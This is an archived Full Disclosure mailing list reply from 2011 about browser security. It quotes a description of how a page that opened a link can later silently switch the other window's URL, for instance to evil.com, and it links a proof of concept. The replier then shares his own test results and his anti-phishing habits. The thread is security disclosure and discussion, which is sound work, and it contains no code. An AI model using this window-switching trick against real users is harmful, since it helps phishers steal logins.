Full Disclosure mailing list archives
Re: Google open redirect
From: Dave <mrx () propergander org uk>
Date: Thu, 08 Dec 2011 09:34:49 +0000
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 08/12/2011 09:13, Michal Zalewski wrote:
For example: did you know that if you click on a link from coredump.cx to microsoft.com and it opens in a new window, then a second or two later, that coredump.cx in the background can change the URL of the microsoft.com window, and point it to evil.com? Heck, coredump.cx can even wait until you navigate further down the microsoft.com website - and detect that event programmatically. That behavior is enshrined within the current design of the same-origin policy, and browser vendors seem hesitant to touch it.Here's a tiny PoC: http://lcamtuf.coredump.cx/switch/ /mz
I run with no script. So the links showed on the initial pages and when clicked. The same address as the links appeared in the address bar when I clicked the links. Running with scripting enabled and clicking the do it button caused this to appear in the address bar: "data:text/html;np.cx/beaver/" I do online banking and being paranoid I do check the address bar and look for https and the "verified by: VeriSign, Inc" popup when mouse over the domain. If anything even slightly suspicious occurs when connecting to my banking logon I will inspect the certificate and may even examine the page source depending on how suspicious I am that my bookmarks may have been compromised or the page is not what I expect it to be. Obviously many users are not this paranoid else wise phishing would not be as successful as it is. Dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTuCEubIvn8UFHWSmAQKN2wgAjMe2BOEo2sSetsfhnEGBGzTjtaW9RYsq eXyYVHOp8gkt9xkvoob4sjK1LV5zuM43qaP2s3TGcQrsx1A3Aqho+C1NuHP70y2f 5E9l8Y4dibifoERzal8yDjBEMJKqi7fbHuYkWz4xrBFyX9fz8GhZbsGI2Sef5621 Df99Ro6jRGfPqMhFcCQLwgudwdz8BDTBIyoYofpqH29su11mOOWvsRieBEfIcYM8 ENnJ8hsBrYy4f9a4b8KNfe6bukiHkIhaH5Td1r/HIxFiUkphAbmXtU7BD3mfo0Cs gvLr8ePOHVCHPUo5hiYhA1nhHRrKDqvpd7D6IvE7BgsqMhrhlYN41Q== =BX4Q -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Google open redirect secure poon (Dec 07)
- Re: Google open redirect Michele Orru (Dec 07)
- Re: Google open redirect Nick FitzGerald (Dec 07)
- Re: Google open redirect Michal Zalewski (Dec 07)
- Re: Google open redirect Luis Santana (Dec 07)
- Re: Google open redirect Michal Zalewski (Dec 07)
- Re: Google open redirect Michal Zalewski (Dec 08)
- Re: Google open redirect Dave (Dec 08)
- Re: Google open redirect Michal Zalewski (Dec 08)
- Re: Google open redirect Michal Zalewski (Dec 07)
- Re: Google open redirect Marsh Ray (Dec 09)
- Re: Google open redirect Michal Zalewski (Dec 09)
- Re: Google open redirect Charles Morris (Dec 12)
- Re: Google open redirect Valdis . Kletnieks (Dec 09)
- Re: Google open redirect Marsh Ray (Dec 11)
- Re: Google open redirect Dave (Dec 09)
- Re: Google open redirect Tavis Ormandy (Dec 10)
- Re: Google open redirect Marsh Ray (Dec 13)
- Re: Google open redirect Tavis Ormandy (Dec 13)